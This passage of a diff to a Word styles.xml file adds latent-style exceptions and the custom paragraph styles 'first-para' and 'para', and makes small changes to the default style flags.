+    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
+    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
+    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
+    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
+    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1"/>
+    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -13254,6 +15037,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
@@ -13261,7 +15045,6 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-    <w:qFormat/>
     <w:tblPr>
       <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblCellMar>
@@ -13514,6 +15297,51 @@
       <w:color w:val="606060"/>
       <w:sz w:val="18"/>
       <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="first-para">
+    <w:name w:val="first-para"/>
+    <w:basedOn w:val="Normal"/>
+    <w:rsid w:val="00A96692"/>
+    <w:pPr>
+      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:color w:val="auto"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="para">
+    <w:name w:val="para"/>
+    <w:basedOn w:val="Normal"/>
+    <w:rsid w:val="00A96692"/>
+    <w:pPr>
+      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:color w:val="auto"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+      <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="HTMLTypewriter">
+    <w:name w:val="HTML Typewriter"/>
